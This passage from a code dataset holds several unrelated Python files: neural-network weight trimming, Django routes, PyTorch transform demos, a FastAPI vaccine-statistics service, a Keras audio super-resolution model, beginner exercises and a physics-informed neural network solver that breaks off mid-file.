indexToModify=np.arange(0,len(State))\n np.random.shuffle(indexToModify)\n 
newState=State.copy()\n \n for val in indexToModify[0:nToModify]:\n delta=(TotalWeights*Fraction/10)*(np.random.random())\n newState[val]=int(newState[val]+delta)\n \n return ForceRange(newState)\n \n\ndef SimulatedAnnealing(StartState,maxSteps=300):\n \"\"\"\n Weight trimming optimization by simulated annealing\n StartState -> List with the weight locations to be trimmed.\n maxSteps -> int, number of steps taken by the optimizer \n \"\"\" \n state=StartState\n cost=ObjetiveFunction(StartState)\n states,costs=[state],[cost]\n \n for k in range(maxSteps):\n fraction=k/float(maxSteps)\n T=Temperature(fraction)\n newstate=RandomNeighbour(state,fraction)\n newcost=ObjetiveFunction(newstate)\n if AcceptanceProbability(cost,newcost,T)>np.random.random():\n state,cost=newstate,newcost\n states.append(state)\n costs.append(cost)\n \n return states,costs\n\n###############################################################################\n# Simulated annealing trimming \n###############################################################################\n\nStartGuess=np.random.choice(np.arange(0,TotalWeights),size=125)\nStates,Costs=SimulatedAnnealing(StartGuess,400)\n\nNewWeights=TrimmByIndex(States[np.argmin(Costs)],CurrentNetworkWeights)\n\nTrimmNetwork=NeuralGenerator(FragmentSize,CurrentArchitecture)\nTrimmNetwork.set_weights(NewWeights)\nTrimmNetwork.compile(loss=\"mse\",optimizer=Adam())\n\nYtrimTrain=TrimmNetwork.predict(Xtrain)\nYtrimTest=TrimmNetwork.predict(Xtest)\n\nfig,axes=plt.subplots(1,2,figsize=(10,5),sharex=False,sharey=True)\n\naxes[0].plot(Ytrain)\naxes[0].plot(YtrimTrain,'r-',alpha=0.75)\naxes[0].set_xlabel(\"Time\")\naxes[0].set_ylabel(\"Price\")\naxes[1].plot(Ytest)\naxes[1].plot(YtrimTest,'r-',alpha=0.75)\naxes[1].set_xlabel(\"Time\")\naxes[1].set_ylabel(\"Price\")\n\nPlotStyle(axes[0])\nPlotStyle(axes[1])\n","repo_name":"TavoGLC/DataAnalysisByExample","sub_path":"NeuralNetworks/SimulatedAnnealing.py","file_name":"SimulatedAnnealing.py","file_ext":"py","file_size_in_byte":15220,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"40209802067","text":"from django.conf.urls import patterns, url\n\nfrom raw_data_analytics import views\n\nurlpatterns = patterns('',\n url(r'^$', views.home, name='raw_data_analytics'),\n url(r'^execute/$', views.execute, name='execute'),\n url(r'^dropdown_partner',views.dropdown_partner,name='dropdown_partner'),\n url(r'^dropdown_state/$', views.dropdown_state, name='dropdown_state'),\n url(r'^dropdown_district/$', views.dropdown_district, name='dropdown_district'),\n url(r'^dropdown_block/$', views.dropdown_block, name='dropdown_block'),\n url(r'^dropdown_village/$', views.dropdown_village, name='dropdown_village'),\n url(r'^dropdown_video/$', views.dropdown_video, name='dropdown_video'),\n url(r'^dropdown_category', views.dropdown_category, name='dropdown_category'),\n url(r'^dropdown_subcategory', views.dropdown_subcategory, name='dropdown_subcategory'),\n url(r'^dropdown_videop', views.dropdown_videop, name='dropdown_videop'),\n url(r'^dropdown_tag', views.dropdown_tag, name='dropdown_tag'),\n \n \n\n # url(r'^output/$', views.create_excel_html, name='output'),\n\n )\n","repo_name":"soitun/dg","sub_path":"raw_data_analytics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"38641343680","text":"from PIL import Image\r\nfrom torch.utils.tensorboard import 
SummaryWriter\r\nfrom torchvision import transforms\r\n\r\nwriter = SummaryWriter(\"logs\")\r\n#writer是一个文件夹\r\nimg = Image.open(\"images/ceshi.jpg\")\r\nprint(img)\r\n\r\n#totensor来转换格式(tensor格式)\r\ntrans_totensor = transforms.ToTensor()\r\nimg_tensor = trans_totensor(img)\r\nprint(img_tensor.shape)\r\nwriter.add_image(\"ToTensor\", img_tensor)\r\nwriter.close()\r\n\r\n# Normalize归一化\r\nprint(img_tensor[0][0][0])\r\n#归一化的计算公式input[channel] = (input[channel] - mean[channel]) / std[channel]\r\ntrans_norm = transforms.Normalize([0.6,0.6,0.6],[0.8,0.7,0.3])\r\n#参数1【mean】:每个信道的平均值序列;参数2【std】:每个信道标准差序列 这里的数字是随便写的,可以自己改\r\n#rgb是三信道\r\nimg_norm = trans_norm(img_tensor)\r\nprint(img_norm[0][0][0])\r\nprint(img_norm[1][1][1])\r\nwriter.add_image(\"Normalize\",img_norm,2)\r\n\r\n# Resize 改变图片大小\r\nprint(img)\r\nimg.show()\r\ntrans_resize = transforms.Resize(200)\r\nimg_resize = trans_resize(img)\r\nprint(img_resize)\r\nimg_resize.show()\r\n\r\n#Compose()用法,需要一个列表。\r\n#所以得到 Compose([transforms参数1,transforms参数2,。。。])\r\ntrans_resize_2 = transforms.Resize((512,512))\r\n#PIL > PIL >tensor\r\ntrans_compose = transforms.Compose([trans_resize_2,trans_totensor])\r\nimg_resize_2 = trans_compose(img)\r\nprint(img_resize_2)\r\nwriter.add_image(\"Resize\",img_resize_2,1)\r\n\r\n#RandomCrop\r\n#随意裁剪512大小的图片\r\ntrans_random = transforms.RandomCrop((200,200))\r\ntrans_compose_2 = transforms.Compose([trans_random,trans_totensor])\r\nfor i in range(10):\r\n img_crop = trans_compose_2(img)\r\n writer.add_image(\"RandomCrop\",img_crop,i)\r\nprint(img_crop.shape)\r\n\r\nwriter.close()\r\n","repo_name":"neonskk/pytorchlearning","sub_path":"4、常见的lTransForms.py","file_name":"4、常见的lTransForms.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28960359173","text":"import sys\nsys.path.append('./')\n\nimport os\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom commons.data.datasets import BipartitionMatricesDataset\nfrom commons.models.cnns import CNN\nfrom commons.models.siamese_networks import VectorSiamese\nfrom commons.models.separator_classifiers import FancySeparatorEnsembleClassifier\nfrom commons.models.separator_classifiers import FancyClassifier\nfrom commons.test_utils.base import test\nfrom commons.test_utils.siamese import test_vector_siamese\nfrom commons.pytorch_utils import save_acc\n\nsiamese_flag = False\nverified_dataset = True\n\nbatch_size = 128\nbatch_interval = 800\nqbits_num = 3\nsep_ch = 16\nsep_fc_num = 4\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nif verified_dataset:\n results_dir = './results/3qbits/discord/nopptes_bisep/'\n model_dir = './paper_models/3qbits/nopptes_bisep/'\nelse:\n results_dir = './results/3qbits/discord/negativity_bisep_test/'\n model_dir = './paper_models/3qbits/negativity_bisep/'\n\nif siamese_flag:\n model_name = 'siam_cnn_class_best_val_paper'\n results_file = 'siam_cnn_class_best_val_paper.txt'\nelse:\n model_name = 'cnn_class_best_val_paper'\n results_file = 'cnn_class_best_val_paper.txt'\n\nos.makedirs(results_dir, exist_ok=True)\nos.makedirs(model_dir, exist_ok=True)\n\nmodel_path = model_dir + model_name + '.pt'\nresults_path = results_dir + results_file\n\npure_dictionary_path = './datasets/3qbits/pure_test/negativity_bipartitions.txt'\npure_root_dir = './datasets/3qbits/pure_test/matrices/'\n\nmixed_ent_dictionary_path = './datasets/3qbits/mixed_test_bal/negativity_bipartitions.txt'\nmixed_disc_dictionary_path = 
'./datasets/3qbits/mixed_test_bal/discord_bipartitions.txt'\nmixed_root_dir = './datasets/3qbits/mixed_test_bal/matrices/'\n\ntest_pure_dataset = BipartitionMatricesDataset(pure_dictionary_path, pure_root_dir, 0.0001)\ntest_pure_loader = DataLoader(test_pure_dataset, batch_size=batch_size, shuffle=True)\n\ntest_mixed_bal_ent_dataset = BipartitionMatricesDataset(mixed_ent_dictionary_path, mixed_root_dir, 0.0001)\ntest_mixed_bal_ent_loader = DataLoader(test_mixed_bal_ent_dataset, batch_size=batch_size, shuffle=True)\n\ntest_mixed_bal_disc_dataset = BipartitionMatricesDataset(mixed_disc_dictionary_path, mixed_root_dir, 0.0001)\ntest_mixed_bal_disc_loader = DataLoader(test_mixed_bal_disc_dataset, batch_size=batch_size)\n\n\nif siamese_flag:\n model = VectorSiamese(qbits_num, test_pure_dataset.bipart_num, 3, 5, 2, 16, ratio_type='sqrt', mode='classifier', biparts_mode='all')\nelse:\n model = CNN(qbits_num, test_pure_dataset.bipart_num, 3, 5, 2, 16, ratio_type='sqrt', mode='classifier')\n\nmodel.double()\nmodel.load_state_dict(torch.load(model_path))\nprint('Model loaded')\n\ncriterion = torch.nn.BCELoss()\n\nsave_acc(results_path, '', ['Pure loss', 'Pure bal accuracy', 'Pure prob ent', 'Pure prob sep', 'Mixed disc loss', 'Mixed disc bal accuracy', 'Mixed disc prob', 'Mixed zero disc prob', 'Mixed ent loss', 'Mixed ent bal accuracy', 'Mixed ent prob', 'Mixed sep prob'], write_mode='w')\n\nif siamese_flag:\n pure_loss, pure_acc, pure_cm, pure_prob_ent, pure_prob_sep, pure_bal_acc = test_vector_siamese(model, device, test_pure_loader, criterion, \"Pure data set\", bipart='separate', negativity_ext=False, low_thresh=0.5, high_thresh=0.5, decision_point=0.5, balanced_acc=True, confusion_matrix=True, confusion_matrix_dim=2)\n mixed_disc_loss, mixed_disc_acc, mixed_disc_cm, mixed_disc_prob, mixed_zero_disc_prob, mixed_disc_bal_acc = test_vector_siamese(model, device, test_mixed_bal_disc_loader, criterion, \"Mixed data set\", bipart='separate', negativity_ext=False, low_thresh=0.5, high_thresh=0.5, decision_point=0.5, balanced_acc=True, confusion_matrix=True, confusion_matrix_dim=2)\n mixed_ent_loss, mixed_ent_acc, mixed_ent_cm, mixed_ent_prob, mixed_sep_prob, mixed_ent_bal_acc = test_vector_siamese(model, device, test_mixed_bal_ent_loader, criterion, \"Mixed data set\", bipart='separate', negativity_ext=False, low_thresh=0.5, high_thresh=0.5, decision_point=0.5, balanced_acc=True, confusion_matrix=True, confusion_matrix_dim=2)\n \nelse:\n pure_loss, pure_acc, pure_cm, pure_prob_ent, pure_prob_sep, pure_bal_acc = test(model, device, test_pure_loader, criterion, \"Pure data set\", bipart=True, confusion_matrix=True, confusion_matrix_dim=2, balanced_acc=True)\n mixed_disc_loss, mixed_disc_acc, mixed_disc_cm, mixed_disc_prob, mixed_zero_disc_prob, mixed_disc_bal_acc = test(model, device, test_mixed_bal_disc_loader, criterion, \"Mixed data set\", bipart=True, confusion_matrix=True, confusion_matrix_dim=2, balanced_acc=True)\n mixed_ent_loss, mixed_ent_acc, mixed_ent_cm, mixed_ent_prob, mixed_sep_prob, mixed_ent_bal_acc = test(model, device, test_mixed_bal_ent_loader, criterion, \"Mixed data set\", bipart=True, confusion_matrix=True, confusion_matrix_dim=2, balanced_acc=True)\n\nsave_acc(results_path, '', [pure_loss, pure_bal_acc, pure_prob_ent, pure_prob_sep, mixed_disc_loss, mixed_disc_bal_acc, mixed_disc_prob, mixed_zero_disc_prob, mixed_ent_loss, mixed_ent_bal_acc, mixed_ent_prob, 
mixed_sep_prob])","repo_name":"Maticraft/quantum_correlations","sub_path":"run/test_bipart_classifier_on_discord.py","file_name":"test_bipart_classifier_on_discord.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4427755541","text":"from fastapi import FastAPI\nfrom typing import Optional\nimport pandas as pd\nimport numpy as np\nfrom utils import grab_info_by_state\n\n# https://towardsdatascience.com/create-your-first-rest-api-in-fastapi-e728ae649a60\n\n\nAPI_VERSION = 1.0\n\ndef _fetch_data():\n print(\"Reading vaccine information\")\n url = \"https://sisa.msal.gov.ar/datos/descargas/covid-19/files/Covid19VacunasAgrupadas.csv.zip\"\n df = pd.read_csv(url)\n print(\"Finished reading\")\n return df\n\n\ndef fetch_recepcion_de_vacunas():\n print(\"Reading reception data\")\n # url = \"http://datos.salud.gob.ar/dataset/7e69d4b4-535d-4d4d-ad4a-362b6a1f4468/resource/d2851fa6-b105-4f15-b352-dd3d792bd526/download/2021-06-29-actas-de-recepcion-vacunas.xlsx\"\n # df = pd.read_excel(url)\n df = pd.read_csv(\"2021-06-29-actas-de-recepcion-vacunas.csv\")\n print(\"Finish Reading\")\n return df\n\n\napp = FastAPI()\n\nvaccine_df = _fetch_data()\nvaccine_reception = fetch_recepcion_de_vacunas()\n\n\n@app.get(\"/\")\ndef home():\n return {\"Greeting\": \"Hello! Go to /docs if you are lost :)\"}\n\n\n@app.get(\"/vaccines/reception_qty\")\ndef get_reception_vaccines_qty():\n \"\"\"\n Get number of vaccines that arrived in the country\n \"\"\"\n qty = vaccine_reception[\"dosis_recibidas\"].sum()\n aux = {\"dosis_recibidas\": int(qty)}\n return aux\n\n\n@app.get(\"/vaccines/qty\")\ndef get_vaccines_qty():\n \"\"\"\n Get administered vaccines quantity by name and total and its percentage\n \"\"\"\n qty = vaccine_df.groupby(\"vacuna_nombre\").apply(\n lambda s: pd.Series(\n {\n \"Cantidad\": (\n s[\"primera_dosis_cantidad\"] + s[\"segunda_dosis_cantidad\"]\n ).sum()\n }\n )\n )\n qty[\"Porcentaje\"] = (qty[\"Cantidad\"] / qty[\"Cantidad\"].sum()) * 100\n qty = qty.sort_values(by=[\"Porcentaje\"], ascending=False)\n qty.loc[\"Total\"] = qty.sum()\n return qty\n\n\n@app.get(\"/vaccines/doses\")\ndef get_number_vaccines_per_dose():\n \"\"\"\n Get the number of doses for first and second doses of vaccines\n \"\"\"\n total_poblacion = 45808747\n prim_dosis = sum(vaccine_df[\"primera_dosis_cantidad\"])\n sec_dosis = sum(vaccine_df[\"segunda_dosis_cantidad\"])\n aux = {\n \"primera_dosis\": int(prim_dosis),\n \"segunda_dosis\": int(sec_dosis),\n \"total_sin_vacunar\": int(total_poblacion - prim_dosis - sec_dosis),\n }\n return aux\n\n\n@app.get(\"/vaccines/by_state/{dose_num}\")\ndef get_vaccines_by_state(dose_num: int):\n \"\"\"\n Get the vaccine information by state of the `{dose_num}` dose\n \"\"\"\n if dose_num not in [1, 2]:\n return {\"Error\": f\"{dose_num} is not a valid dose number\"}\n\n dose_col = \"primera_dosis_cantidad\" if dose_num == 1 else \"segunda_dosis_cantidad\"\n return grab_info_by_state(vaccine_df, dose_col)\n\n\n@app.get(\"/vaccines/by_date\")\ndef get_vaccines_by_date():\n \"\"\"\n Get the vaccine information by date. 
Returns data for every vaccine and both doses.\n Response Format:\n An `array` where each element has as array with the following format:\n ```\n [date, vaccine_name, dose_num, qty]\n ```\n \"\"\"\n df = pd.read_csv(\"dates_vaccines_qty.csv\")\n\n response = dict()\n response[\"header\"] = list(df.columns.to_numpy())\n data = []\n for index in range(0, len(df)):\n tmp_arr = list(df.iloc[index].to_numpy())\n tmp_arr[2] = int(tmp_arr[2])\n data.append(tmp_arr)\n\n response[\"content\"] = data\n return response\n\n\n@app.get(\"/version\")\ndef get_version():\n \"\"\"\n Return the current version of the API.\n Serves also as a \"health\" endpoint to make sure the API is up.\n \"\"\"\n return {\"version\": f\"{API_VERSION}\"}\n","repo_name":"ignacioVidaurreta/vacunas-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5271256155","text":"import tensorflow as tf\nfrom functools import partial\nfrom tensorflow.keras.layers import Add, Conv1D, Lambda, PReLU, Conv2DTranspose\nfrom tensorflow.keras import Input\nfrom tensorflow.keras.models import Model\nfrom model.common import pixel_shuffle, denormalize, normalize, normalize_1, denormalize_1\n\ndef edsr(scale, num_filters=32, res_blocks=[9,9,9,5,5,5,3,3], res_block_scaling=None, summary=True):\n assert type(res_blocks) == list, 'res_blocks should be list type'\n\n print(f'Number of Residual blocks {len(res_blocks)}')\n\n x_in = Input(shape=(None, 1))\n # x = Lambda(normalize, name='Normalize')(x_in)\n x = b = Conv1D(num_filters, 9, padding='same')(x_in)\n\n # residual blocks\n for f in res_blocks:\n x = residual_block2(x, num_filters, f, res_block_scaling)\n\n b = Conv1D(num_filters, 3, padding='same')(b)\n x = Add()([x, b])\n\n x = upsample(x, scale, num_filters)\n x = Conv1D(1, 3, padding='same')(x)\n # x = Lambda(denormalize, name='Denormalize')(x)\n\n model = Model(x_in, x)\n\n if summary:\n model.summary()\n\n return model\n\ndef edsr2(scale, num_filters=32, res_blocks=[9,9,9,5,5,5,3,3], res_block_scaling=None, summary=True):\n assert type(res_blocks) == list, 'res_blocks should be list type'\n\n print(f'Number of Residual blocks {len(res_blocks)}')\n\n x_in = Input(shape=(None, 1))\n # x = Lambda(normalize, name='Normalize')(x_in)\n x = b = Conv1D(num_filters, 9, padding='same')(x_in)\n\n # residual blocks\n for f in res_blocks:\n x = residual_block(x, num_filters, f, res_block_scaling)\n\n b = Conv1D(num_filters, 3, padding='same')(b)\n x = Add()([x, b])\n\n x = upsample(x, scale, num_filters)\n x = Conv1D(num_filters//2, 3, padding='same', activation='tanh', kernel_initializer='glorot_uniform')(x)\n # x = PReLU(alpha_initializer='zeros', shared_axes=[1])(x)\n x = Conv1D(8, 3, padding='same')(x)\n x = Conv1D(1, 3, padding='same')(x)\n # x = Lambda(denormalize, name='Denormalize')(x)\n\n model = Model(x_in, x)\n\n if summary:\n model.summary()\n\n return model\n\ndef residual_block(x_in, num_filters, f, scaling):\n x = Conv1D(num_filters, f, padding='same', activation='tanh', kernel_initializer='glorot_uniform')(x_in)\n # x = PReLU(alpha_initializer='zeros', shared_axes=[1])(x)\n x = Conv1D(num_filters, f, padding='same')(x)\n x = Conv1D(num_filters, f, padding='same')(x)\n if scaling:\n x_in = Lambda(lambda x : x * (1-scaling))(x_in)\n x = Lambda(lambda x : x * scaling)(x)\n x = Add()([x, x_in])\n return x\n\ndef residual_block2(x_in, num_filters, f, scaling):\n x1 = x2 = x_in\n # Main 
branch(auto encoder)\n x1 = Conv1D(num_filters, f, padding='same', activation='tanh')(x1)\n x1 = Conv1D(num_filters, f, padding='same', strides=2)(x1)\n x1 = Conv1D(num_filters, f, padding='same')(x1)\n x1 = Conv1D(num_filters, f, padding='same', strides=2)(x1)\n x1 = Conv1D(num_filters, f, padding='same')(x1)\n x1 = Conv1DTranspose(x1, num_filters, f, 2, 'SAME', [1,0])\n x1 = Conv1DTranspose(x1, num_filters, f, 2, 'SAME', [1,0])\n\n # Branch_1\n x2 = Conv1D(num_filters, f, padding='same', activation='tanh')(x2)\n # x2 = PReLU(alpha_initializer='zeros', shared_axes=[1])(x2)\n x2 = Conv1D(num_filters, f, padding='same')(x2)\n if scaling:\n x1 = Lambda(lambda x : x * scaling)(x1)\n x2 = Lambda(lambda x : x * scaling)(x2)\n x_in = Lambda(lambda x : x * scaling)(x_in)\n\n x = Add()([x1, x2, x_in])\n return x\n\ndef Conv1DTranspose(x, filters, kernel_size, strides=2, padding='same', output_padding=[2,1]):\n x = Lambda(lambda x : tf.expand_dims(x, axis=2))(x)\n x = Conv2DTranspose(filters=filters, kernel_size=(kernel_size, 1), strides=(strides,1), padding=padding, output_padding=output_padding)(x)\n x = Lambda(lambda x : tf.squeeze(x, axis=2))(x)\n return x\n\n\ndef upsample(x, scale, num_filters):\n def upsample_1(x, scale, **kwargs):\n x = Conv1D(num_filters * scale, 3, padding='same', **kwargs)(x)\n return Lambda(partial(pixel_shuffle, scale=scale))(x)\n\n if scale == 2:\n x = upsample_1(x, scale, name='conv1d_1_scale_2')\n elif scale == 3:\n x = upsample_1(x, scale, name='conv1d_1_scale_3')\n else:\n x = upsample_1(x, 2, name='conv1d_1_scale_2')\n x = upsample_1(x, 2, name='conv1d_2_scale_2')\n\n return x\n","repo_name":"BluePinetree/Audio-Super-Resolution","sub_path":"model/edsr.py","file_name":"edsr.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29997924455","text":"# Criar um programa que receba 5 notas de um aluno, armazenando-as em uma lista. Criar uma função que receba como parâmetro a lista de notas, e retorne a média aritmética.\nimport random\n\n\ndef CalculoMedia(nota):\n soma = 0\n for x in range(0, len(nota)):\n soma = soma+nota[x]\n media = soma/len(nota)\n return media\n\n\nNotas = []\nfor y in range(0, 5):\n Notas.append(float(input(f\"Digita a nota {y+1}: \")))\nResultado = CalculoMedia(Notas)\nprint(f\"A média é: {round(Resultado, 3)}\")\n# Criar um programa que receba o nome de 10 pessoas e classifique em ordem crescente.\nNomes = [\"João\", \"Marcelo\", \"Leonardo\", \"Franca\", \"Giovana\",\n \"Milena\", \"José\", \"Rafael\", \"Kayque\", \"David\"]\nprint(sorted(Nomes))\n# Dado um número real X e um número natural K, calcular a potência X elevado a K através de produtos sucessivos. x k = x.x.x.x. ...... x\nx = float(input(\"Digita um número: \"))\nk = int(input(\"Digite o número expoente: \"))\nif x == 0 or x == 1:\n xk = x\nelse:\n xk = x**k\nprint(f\"O resultado é: {xk}\")\n# Com relação a listas, Python dispõe de métodos específicos para a realização das diversas atividades referentes a lista. 
Descreva qual a forma de executar cada uma das atividades abaixo descritas, usando as estruturas de listas em Python e, quando houver, o método utilizado.\n# Para fins de exemplo, considere uma lista com 10 elementos de nome lista e outra lista com 5 elementos de nome lista2 para exemplificar o uso.\nLista_1 = [\"João\", \"Marcelo\", \"Leonardo\", \"Franca\",\n \"Giovana\", \"Milena\", \"José\", \"Rafael\", \"Kayque\", \"David\"]\nLista_2 = [\"Vinicius\", \"Marta\", \"Alex\", \"Greicy\", \"Arnaldo\"]\n# Acessar um elemento qualquer da lista;\nprint(random.choice(Lista_1))\nprint(random.choice(Lista_2))\n# Inserir um elemento numa posição específica da lista;\nLista_1.insert(5, \"Guilherme\")\nLista_2.insert(2, \"André\")\n# Remover um elemento de numa posição específica da lista;\nLista_1.pop(7)\nLista_2.pop(0)\n# Combinar duas listas em uma única;\nLista_Total = Lista_1+Lista_2\nprint(Lista_Total)\n# Particionar uma lista em duas;\nLista_Total.pop(2)\nLista_Total.pop(7)\nLista_Total.pop(1)\nLista_dividida = [Lista_Total[x:x + 6] for x in range(0, len(Lista_Total), 6)]\nprint(Lista_dividida)\nLista_1 = Lista_dividida[0]\nLista_2 = Lista_dividida[1]\n# Obter cópia de uma lista;\nLista_1Nova = []\nfor itens in Lista_1:\n Lista_1Nova.append(itens)\nprint(Lista_1Nova)\n# pode ser usado copy()\n# Determinar o total de elementos na lista;\nprint(len(Lista_2))\n# Ordenar elementos da lista;\nprint(sorted(Lista_1Nova))\n# Procurar um determinado elemento na lista;;\nprint(Lista_1Nova[4])\nprint(Lista_2[1])\n# Apagar uma lista.\ndel Lista_2\n# Crie um programa que receba e armazene dados estatísticos da média de notas de uma escola e armazene em uma lista. A lista deve receber tantos elementos quanto necessário até que o usuário digite 0 como a média. Neste momento, obtenha a moda da lista usando uma função e a média da lista e exiba\n\n\ndef ModaMedia(nota):\n import statistics\n soma = 0\n Moda = statistics.mode(nota)\n for x in range(0, len(nota)):\n soma = soma+nota[x]\n media = soma/len(nota)\n print(f\" A média é {round(media, 3)} e a moda é {Moda}\")\n\n\nNotas = []\ncount = 1\ncount_nota = 1\nwhile (count != 0):\n Notas.append(\n float(input(f\"Digita a nota {count_nota} ou digite zero para parar: \")))\n count = Notas[count_nota-1]\n count_nota += 1\nif 0 in Notas:\n Notas.remove(count)\n ModaMedia(Notas)\n# Crie um programa que receba dois números e ache todos os números primos existentes no intervalo entre os dois números informados.\n\n\ndef NumeroPrimo(num, num2):\n for x in range(num, num2+1):\n count_multi = 0\n for y in range(1, x+1):\n if x % y == 0:\n count_multi += 1\n if count_multi <= 2:\n print(f\"O número {x} é primo\")\n count_multi = 0\n\n\nnumero = int(input(\"Digita um número: \"))\nnumero2 = int(input(\"Digite um outro número: \"))\nNumeroPrimo(numero, numero2)\n# CRIE UM PROGRAMA QUE RECEBA O NOME DO ALUNO E SUAS 5 MÉDIAS, E DEPOIS IMPRIMA O NOME DO ALUNO,\n# SUAS MÉDIAS E A MÉDIA FINAL, QUE SERÁ CALCULADA POR UMA FUNÇÃO.\n\n\ndef CalculoMedia(nota):\n soma = 0\n for x in range(0, len(nota)):\n soma = soma+nota[x]\n media = soma/len(nota)\n return media\n\n\nnome = []\nmedia = []\nmedia_final = []\nx = 0\nwhile x < 5:\n nome.append(input(\"informe o nome do aluno: \"))\n y = 0\n while y < 5:\n media.append(int(input(\"Informe a média do aluno: \")))\n y += 1\n x += 1\n\nx = 0\nMedia_Divida_Aluno = [media[x:x + 5] for x in range(0, len(media), 5)]\nwhile x < 5:\n media_final.append(CalculoMedia(Media_Divida_Aluno[x]))\n x += 1\nx = 0\nwhile x < 5:\n print(f\"Aluno: 
{nome[x]}\")\n print(f\"Médias dos 5: {Media_Divida_Aluno[x]}\")\n print(f\"Média final: {media_final[x]}\")\n x += 1\n","repo_name":"guilhermehencus/Python_Estrutura_Dados","sub_path":"Exercicios_2.py","file_name":"Exercicios_2.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37877179247","text":"arr = [2, 3, 5, 2, 8, 2, 9, 2] # example array\ncount = 0 # to store the count of 2's\n\nfor num in arr:\n if num == 2:\n count += 1\n\nprint(count) # output: 4\n\n# With Function\ndef count_number(arr, num):\n count = 0\n for n in arr:\n if n == num:\n count += 1\n return count\n\narr = [2, 3, 5, 2, 8, 2, 9, 2] # example array\nnum = 2 # example number to count\nprint(count_number(arr, num)) # output: 4\n","repo_name":"NFRIDOY/Interval-of-Prime-Numbers","sub_path":"NumberCounter2.py","file_name":"NumberCounter2.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29388241505","text":"list = []\nf = open(\"datalogs.txt\")\nlist = f.readlines()\nprint(list)\nphrase = input(\"Please type phrase with 1 word replaced with --\")\nwords = phrase.split()\n#do AI thing idk\npreword = -1\nfor i in words:\n if i == \"--\":\n break\n preword += 1\npostword = 1\nfor i in words:\n if i == \"--\":\n break\n postword += 1\n\nprewordOK = True\npostwordOK = True\n\n#try Exception\ntry:\n temptry = (words[preword])\nexcept:\n prewordOK = False\n\ntry:\n temptry = (words[postword])\nexcept:\n postwordOK = False\npostcorrelation=-1\npostmatch = False\nif (postwordOK):\n for i in list:\n if(i==words[postword]):\n postmatch = True\n break\n postcorrelation += 1\n\nif (postcorrelation>-1):\n answer = list[postcorrelation]\n\nprint(answer)\n\nprint(words[preword]+words[postword])\nwords.append(\"|\")\nlist.append(input(\"hey\")+ \"\\n\")\nx = 0\nfor i in list:\n print(x)\n if list[x] == \"\\n\":\n list.pop(x)\n x += 1\nf.close\nf = open(\"datalogs.txt\",\"w\")\nprint(list)\n\n\nfor element in list:\n if (element != \"\\n\"):\n print(\"element accepted \"+element)\n f.write(element + \"\\n\")\n print(\"write\" + element)\n else:\n print(\"pass\")\nf.close\nf = open(\"datalogs.txt\")\nlist = f.readlines()\nprint(list)","repo_name":"codeman3000/ChatApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33641664036","text":"import tensorflow as tf\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\nclass PINNSolver():\n def __init__(self, model, residual_sample_points):\n self.model = model\n\n self.t = residual_sample_points[:, 0:1]\n self.x = residual_sample_points[:, 1:2]\n\n self.history = []\n self.iterations = 0\n\n def get_residual(self):\n with tf.GradientTape(persistent=True) as tape:\n tape.watch(self.t)\n tape.watch(self.x)\n\n u = self.model(tf.stack([self.t[:, 0], self.x[:, 0]], axis=1))\n u_x = tape.gradient(u, self.x)\n\n u_t = tape.gradient(u, self.t)\n u_xx = tape.gradient(u_x, self.x)\n\n del tape\n\n return self.get_raw_residual(self.t, self.x, u, u_t, u_x, u_xx)\n\n def loss(self, X, u):\n r = self.get_residual()\n phi_r = tf.reduce_mean(tf.square(r))\n\n loss = phi_r\n\n for i in range(len(X)):\n u_pred = self.model(X[i])\n loss += tf.reduce_mean(tf.square(u[i] - u_pred))\n\n return loss\n\n def get_gradient(self, X, u):\n with 
tf.GradientTape(persistent=True) as tape:\n tape.watch(self.model.trainable_variables)\n loss = self.loss(X, u)\n\n g = tape.gradient(loss, self.model.trainable_variables)\n del tape\n\n return loss, g\n\n def get_raw_residual(self, t, x, u, u_t, u_x, u_xx):\n viscosity = 5\n return u_t + u * u_x - viscosity * u_xx\n\n def solve(self, optimizer, X, u, N=1001):\n @tf.function\n def train_step():\n loss, grad_theta = self.get_gradient(X, u)\n\n optimizer.apply_gradients(\n zip(grad_theta, self.model.trainable_variables))\n return loss\n\n for _ in range(N):\n loss = train_step()\n\n self.current_loss = loss.numpy()\n self.callback()\n\n def callback(self):\n if self.iterations % 50 == 0:\n print('Iteration {:05d}: loss = {:10.8e}'.format(\n self.iterations, self.current_loss))\n self.history.append(self.current_loss)\n self.iterations += 1\n\n def plot_solution(self, **kwargs):\n N = 600\n t = np.linspace(\n self.model.lower_bounds[0], self.model.upper_bounds[0], N+1)\n x = np.linspace(\n self.model.lower_bounds[1], self.model.upper_bounds[1], N+1)\n T, X = np.meshgrid(t, x)\n x_grid = np.vstack([T.flatten(), X.flatten()]).T\n u_prediction = self.model(tf.cast(x_grid, \"float32\"))\n U = u_prediction.numpy().reshape(N+1, N+1)\n fig = plt.figure(figsize=(9, 6))\n ax = fig.add_subplot(111, projection='3d')\n ax.plot_surface(T, X, U, cmap='viridis', **kwargs)\n ax.set_xlabel('$t$')\n ax.set_ylabel('$x$')\n ax.set_zlabel('$u_\\\\theta(t,x)$')\n ax.view_init(35, 35)\n plt.show()\n\n def 